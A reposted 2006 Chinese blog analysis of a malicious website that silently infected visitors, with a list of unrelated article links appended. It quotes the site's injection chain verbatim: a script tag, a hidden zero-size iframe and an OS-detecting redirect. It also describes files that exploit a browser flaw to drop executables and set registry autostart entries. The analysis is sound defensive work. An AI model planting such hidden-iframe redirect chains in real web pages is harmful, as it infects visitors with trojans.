关于hxxp://www.hj234.com的问题
来源:互联网 发布:java post 二进制数据 编辑:程序博客网 时间:2024/05/06 10:20
endurer 原创
2006-04-24 第1版
在hxxp://www.hj234.com的主页有代码:
<script language=JavaScript src="hxxp://www.***hj234.com/abc/abc.js"></script>
hxxp://www.***hj234.com/abc/abc.js的内容为:
document.write("<iframe height=0 width=0 frameborder=0 src='hxxp://www.***hj234.com/abc/joke.htm'></iframe>")
hxxp://www.***hj234.com/abc/joke.htm的内容为:
<center><font color=red>对不起,您访问的页面不存在!</font><center> <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>
会根据浏览者所用Windows版本,打开windows.htm,winnt.htm或w98.htm
从这个网页开始,所用的技术与发现一个使用技术升级、下载灰鸽子的网站相同。
这3个网页会下载/运行文件young.gif和young.css
young.gif 是个利用系统漏洞的网页文件,访问注册表获取IE临时文件夹路径,并利用WScript.Shell复制文件young.css,创建文件c:/wins.bat,c:/boot.hta,C:/wins.exe。
江民KV2006报为Exploit.VBS.Phel.ba
young.css 用VB6编写,修改IE启动页,创建名为services.exe的文件,并在注册表的run键加入开机启动项,江民KV2006报为TrojanDropper.Delf.d
- 关于hxxp://www.hj234.com的问题
- hxxp://www.hao923.com.cn/劫持浏览器
- 关于www.ting789.com劫持浏览器的问题
- 关于www.pythonchallenge.com的记录
- http://www.myeclipseide.com/ 官网打不开的问题
- [04-16] 关于www.71791.com的问题(第2版)
- 关于JAVA的字符编码问题()http://www.cndw.com/tech/program/2006042861203.asp
- 关于com的问题
- 关于www.eygle.com最近的一系列调整
- 关于开机老弹出腾讯网迷你网首页,关闭后又弹出www.37ss.com的问题
- C#一个关于反序列化的小问题 http://www.csharpwin.com/csharpspace/12720r6124.shtml
- 关于[root@yww etc]# ping www.baidu.com connect: Network is unreachable centOS ping外网的问题
- 关于wamp修改www目录的问题
- 解决www.54kk.com/baidu劫持浏览器的问题
- 解决弹出www.duduw.com广告的问题
- http://www.myeclipseide.com/ 官网打不开的问题!myeclipse 官网!
- 修复 www.shouyela.com 造成的 IE 问题
- 关于本博客 http://www.imobilebbs.com
- 一个JSP上传文件和下载文件的JavaBean
- 古老的祝福
- C#面向对象设计模式纵横谈(1):面向对象设计模式与原则
- 使用Fileupload上传组件
- 浅谈ACCESS数据库升迁SQLSERVER注意事项
- 关于hxxp://www.hj234.com的问题
- peiqin 2006-4-24
- 遭遇rootkit.win32.vanti.bq病毒
- 操作系统入门(五) - 载入32位保护模式代码为c做准备
- ACE相关资料
- JavaBeans 教程
- 康雍二帝对清官的不同态度
- VE 可视化的java编辑插件
- 术语Ajax
